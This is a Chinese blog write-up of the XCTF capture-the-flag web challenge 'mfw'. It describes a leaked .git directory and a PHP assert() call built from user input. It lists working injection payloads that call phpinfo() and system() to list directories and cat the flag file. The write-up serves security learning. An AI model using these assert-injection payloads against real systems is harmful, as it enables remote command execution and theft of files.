XCTF WEB mfw

最新推荐文章于 2024-05-09 02:07:57 发布
最新推荐文章于 2024-05-09 02:07:57 发布
阅读量4.4k 收藏 4
点赞数 7
分类专栏: CTF题 XCTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42967398/article/details/90758521
版权
CTF题 同时被 2 个专栏收录
115 篇文章 16 订阅
订阅专栏
XCTF
24 篇文章 0 订阅
订阅专栏

XCTF WEB mfw

  • 比赛打自闭了,需要好好学习

打开网页看见(猜测git源码泄露):
在这里插入图片描述
在URL后面加上./git发现:
在这里插入图片描述
使用脚本,在Linux环境中:

pip install requests
git clone https://github.com/wangyihang/GitHacker.git
python GitHacker.py [Website]

得到源码:
在这里插入图片描述
flag文件貌似没得啥:
在这里插入图片描述
查看index.php文件内容得到PHP源码:

<?php

if (isset($_GET['page'])) {
	$page = $_GET['page'];
} else {
	$page = "home";
}

$file = "templates/" . $page . ".php";

// I heard '..' is dangerous!
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");

// TODO: Make this look nice
assert("file_exists('$file')") or die("That file doesn't exist!");

?>
html代码........

代码审计以及思路:

了解assert()函数的使用:
在这里插入图片描述
assert()函数会将读入的代码当做PHP代码来执行,这就方便了!!
进行注入,注入的思路:

  • 首先对strpos函数进行闭合,构造一下,page=’)

  • 可以把后面', '..') === false的给注释掉,构造page=').phpinfo();//,可以得到回显在这里插入图片描述

  • 或者不注释也行,直接插入,构造page='.phpinfo().',也可以看见:在这里插入图片描述

  • 既然可以执行函数,那就简单了,使用system()函数(system函数详解),构造查看目录的payload:?page='.system("ls").'或者page=').system("ls");//前者直接显示,后者在源码中才能看见。

  • 由于源码直接下载有,所以直接构造得到flag的payload:?page=').system("cat templates/flag.php");//或者?page='.system("cat templates/flag.php").'两者都需查看源码!!

在这里插入图片描述
第二个payload:

A_dmins
关注
  • 7
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 7
    评论
专栏目录
XCTF mfc逆向-200
12-22
查壳 vmp。。。 看了大佬博客后得知解法 这是一个MFC程序,但我不会。。。...但是我知道mfc的程序应该都是一个个控件组成 ...发现这两个东西,第一个是窗口类名,第二个我也不晓得是啥,但是它比前面和后面的少了一个消息...
XCTF攻防世界web.doc
09-19
XCTF攻防世界Web WriteUp】 在网络安全竞赛中,CTF(Capture The Flag)是一种常见的形式,其中“XCTF攻防世界”是一个专注于Web安全的平台,旨在帮助参与者提升网络安全技能,特别是Web应用的安全防御和攻击能力...
XCTF-mfw
TA不懒,但还没有添加简介
01-27 298
XCTF-mfw
XCTF-高手进阶区:mfw
1stPeak's Blog
06-13 3785
XCTF-高手进阶区-第三题:mfw 目标: 学习git泄露有关知识: 当前大量开发人员使用git进行版本控制,对站点自动部署。如果配置不当,可能会将.git文件夹直接部署到线上环境。这就引起了git泄露漏洞 会简单构造php的payload 了解urlencode Writeup (1)我们在http://111.198.29.45:46634/?page=about页面看到如下图...
【CTF WebXCTF GFSJ0480 simple_js Writeup(JS分析+ASCII码)
最新发布
HEX9CF的技术博客
05-09 405
小宁发现了一个网页,但却一直输不对密码。(Flag格式为 Cyberpeace{xxxxxxxxx} )
攻防世界XCTFmfw
末初的CSDN博客
03-07 447
发现使用git进行网站部署,尝试 /.git查看是否git泄漏。 git泄漏 当前大量开发人员使用git进行版本控制,对站点自动部署。 如果配置不当,可能会将.git文件夹直接部署到线上环境,这就引起了git泄露漏洞。 GitHack 项目地址:https://github.com/lijiejie/GitHack GitHack是一个.git泄露利用脚本,通过泄露的.git文件夹下的文件,还...
xctf攻防世界 Web高手进阶区 mfw
l8947943的博客
08-11 7534
题目给出的内容如图:一通点击后,发现链接中出现page=***的字样,说明page传参是重点,是问题的突破口。
[xctf]mfw 命令执行&&php语句执行&&assert
qq_37301470的博客
11-21 164
mfw (这有啥含义吗??) 右键查看源码 <!--<li class="active"><a href="?page=flag">My secrets</a></li> --> 得知要读取flag文件内容 提示git 是.git文件泄露 使用githack扫描得出源码 重要源码如下 <?php if (isset($_GET['page'])) { $page = $_GET['page']; } else { $page
web 2.11 upload1.md
12-16
xctf
圣徒xctf网站
02-14
圣徒xctf网站概述SaintsXCTF Web应用程序的前端。 这是SaintsXCTF Web应用程序的第二个版本。 前端使用React.js编写,并使用Sass进行样式设置。 API调用通过Nginx代理路由到 。指令在本地启动应用程序首次设置应该...
XCTF-攻防世界CTF平台-Web类——19、mfw(.Git源代码泄露、php的assert断言)
Onlyone_1314的博客
12-11 3694
打开题目地址: 是一个作者用php写的网站 在About页面,作者介绍他使用了Git、PHP、Bootstrap 之后我们查看页面源代码: 在每个页面的注释里都有一个隐藏页面:?page=flag,提示flag应该就在这个页面。我们也注意到home、contact和about页面都是通过访问index.php页面以GET方式的page参数来跳转页面的:?page=home、?page=contact、?page=about。 所以我们直接访问: http://111.200.241.244:60434
Web攻防实验报告
01-24
Web攻防实验报告,设计WebGoat攻击和预防以及XSS攻击预防的详细实验步骤,了解Web攻防原理
2020.4.5 xctf(mfw)②
DSR446的博客
04-05 205
打开网页看见(猜测git源码泄露): 在URL后面加上./git发现: 使用工具GitHack进行爬取 发现源码内存在flag.php 感觉没啥用 if (isset($_GET[‘page’])) { $page = $_GET[‘page’]; } else { $page = “home”; } $file = “templates/” . $page . “.php”; // I ...
XCTF-MFW Git泄露,命令执行漏洞 详解
AAAAAAAAAAAA66的博客
11-15 1269
最近自学了1个月的CTFweb题,参加比赛一道题都没做出来,有点自闭,但还是告诉自己要慢慢来,有意向打CTF的同学可以私信,一起学习。 目录 题目 解题过程 总结 题目 解题过程 工具 思路 过程 总结 ...
xctf web
05-09 3207
view_source 难度系数: 题目来源: Cyberpeace-n3k0 X老师让小宁同学查看一个网页的源代码,但小宁同学发现鼠标右键好像不管用了 可以通过view-source:的方法来访问源码: view-source:加上url 在url中提交后便可访问页面源码,在源码中可找到flag。 这个题目很简单,但是如果使用的浏览器是ie edge等,用例如 view-source:htt...
XCTF php2
qq_41941506的博客
05-13 3468
初次进入环境,出现如下图所示界面 先在域名中输入index.php欲要查看主页面,结果依旧是上述界面,此时,将php改为phps,尝试查看php源码,如下图所示 出现源码,代码审计,可以看出,get接受id=admin时,会出现key值,即可能出现flag,但是,当输入“?id=admin”时 会提示错误,故此,想到可能admin 被设为了敏感字符,造成了只要识别到admin就会...
XCTF攻防世界web进阶练习_ 5_mfw
silence1_的博客
05-02 3478
XCTF攻防世界web进阶练习—mfw 题目 题目为mfw,没有任何提示。 直接打开题目,是一个网站 大概浏览一下其中的内容,看到其中url变化其实只是get的参数的变化 查看它的源码,看到有一个?page=flag,flag应该在这个页面里面 但是进入这个页面发现是空的 注意到有这样一个页面,说道用到了Git方法,想到是否可能和Git源码泄露有关 于是试一下http://111.198.2...
XCTF WEB webshell
无限迭代中......
06-30 1685
https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=0&id=5070 版本一 题解:修改HTML代码提交一个shell的变量 变量值是webshell命令 ​​​​​​​<form action="http://111.198.29.45:36317/index.php" meth...
XCTF攻防世界web新手练习_ 9_command_execution
silence1_的博客
04-29 5454
XCTF攻防世界web新手练习—command_execution 题目 题目为command_execution,是命令执行的意思,可见这道题应该跟命名执行有关。 打开题目,看到一个功能框,根据题目,是用来ping功能的。 首先先尝试ping一下127.0.0.1,成功ping通,并回显执行的命令为 ping -c 3 127.0.0.1 于是我们尝试用&&符号执行多个...
xctf supersqli
09-01
对于 xctf supersqli,它是一个供参与者练习 SQL 注入技巧的 CTF(Capture The Flag)比赛题目。CTF比赛是一种网络安全竞赛,旨在测试参与者在各种安全领域的技能。在 xctf supersqli 中,参与者需要利用 SQL 注入...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值